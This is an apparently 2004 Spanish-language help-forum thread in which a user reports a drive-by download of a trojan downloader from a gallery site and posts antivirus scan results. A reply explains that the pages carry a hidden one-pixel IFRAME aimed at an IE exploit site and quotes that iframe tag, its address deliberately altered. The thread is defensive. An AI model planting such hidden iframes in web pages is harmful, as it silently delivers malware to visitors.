Forums Últimos mensajes - Powered by IBM
 
Tags Palabras claves

Buen servicio

03/07/2004 - 05:54 por Rafael Alberto Moreno Parra | Informe spam
Ayuda Hacer una pregunta
02 de Julio de 2004

Saludos
Entré a esta página: http://nache.debianitas.net/galeria/capturas/ para ver
una serie de imágenes sobre "looking glass de Sun". Usando Internet Explorer
6.0 (Windows XP SP1) todos los parches, observé que se me disparó el
"Download Accelerator" y me descargo el programa LOADFOX.EXE, el cual no lo
he ejecutado, le pasé un antivirus actualizado a hoy (AVG Antivirus) y me
dice que no hay problema. Si navego la página con FireFox 0.91 no hay tal
descarga. Fuí hasta virus total (www.virustotal.com) envié el especimen,
esta fue su respuesta:

Este es el resultado de analizar el archivo "loadfox.exe" que VirusTotal ha
procesado el dia 03/07/2004 a las 05:46:52.
Antivirus Version Actualización Resultado
BitDefender 7.0 02.07.2004 -
eTrustAV-Inoc 4641 01.07.2004 -
F-Prot 3.14e 02.07.2004 -
Kaspersky 3.0 03.07.2004 TrojanDownloader.Win32.Harnig.y
McAfee 4372 02.07.2004 -
NOD32v2 1.801 02.07.2004 -
Panda 7.02.00 02.07.2004 -
Sybari 7.50.1138 03.07.2004 -
Symantec 8.0 02.07.2004 -
TrendMicro 1.00 02.07.2004 -


Increible!! solo uno dijo que eso era un troyano. Como observan a algunos
antivirus se les escapan algunos.

Ing. Rafael Alberto Moreno Parra
ramoreno@uniweb.net.co
http://protegepc.fateback.com (Seguridad en Windows)
http://www.geocities.com/krousky (Investigación sobre Vida Artificial)
email Siga el debateRespuesta 1 respuestaRespuesta Tengo una respuesta
DRAGON AGE™: INQUISITION – Matadragones
 

Leer las respuestas

#1 Ramón Sola [MVP Windows Client]
03/07/2004 - 08:53 | Informe spam
Hash: SHA1

Resulta que las páginas de ese servidor, intencionadamente o por descuido
de su administrador (por no instalar los parches de IIS), incluyen al
final un IFRAME a un sitio que intenta aprovecharse de las
vulnerabilidades de Internet Explorer que aún no tienen solución por parte
de Microsoft, entre ellas ejecución de código en la zona Mi PC a través de
enlaces ms-its expresamente creados y sobreescritura de archivos a través
del objeto ADODB.Stream.

(He alterado el enlace.)
<IFRAME SRC="uggc : // jjj.GelGbVzcebirFrphevgl.pbz/sn/?q=trg" WIDTH=1
HEIGHT=1>
</IFRAME>

Ramón Sola @ Málaga (España) / MVP Windows - Shell/User
(quitar "IFeelGreat")

Rafael Alberto Moreno Parra () animó a la
concurrencia con esto:
02 de Julio de 2004

Saludos
Entré a esta página: http://nache.debianitas.net/galeria/capturas/ para
ver una serie de imágenes sobre "looking glass de Sun". Usando Internet
Explorer
6.0 (Windows XP SP1) todos los parches, observé que se me disparó el
"Download Accelerator" y me descargo el programa LOADFOX.EXE, el cual
no lo he ejecutado, le pasé un antivirus actualizado a hoy (AVG
Antivirus) y me dice que no hay problema. Si navego la página con
FireFox 0.91 no hay tal descarga. Fuí hasta virus total
(www.virustotal.com) envié el especimen, esta fue su respuesta:

Este es el resultado de analizar el archivo "loadfox.exe" que
VirusTotal ha procesado el dia 03/07/2004 a las 05:46:52.
Antivirus Version Actualización Resultado
BitDefender 7.0 02.07.2004 -
eTrustAV-Inoc 4641 01.07.2004 -
F-Prot 3.14e 02.07.2004 -
Kaspersky 3.0 03.07.2004 TrojanDownloader.Win32.Harnig.y
McAfee 4372 02.07.2004 -
NOD32v2 1.801 02.07.2004 -
Panda 7.02.00 02.07.2004 -
Sybari 7.50.1138 03.07.2004 -
Symantec 8.0 02.07.2004 -
TrendMicro 1.00 02.07.2004 -


Increible!! solo uno dijo que eso era un troyano. Como observan a
algunos antivirus se les escapan algunos.

Ing. Rafael Alberto Moreno Parra

http://protegepc.fateback.com (Seguridad en Windows)
http://www.geocities.com/krousky (Investigación sobre Vida Artificial)

Preguntas similares

 

Busqueda sugerida :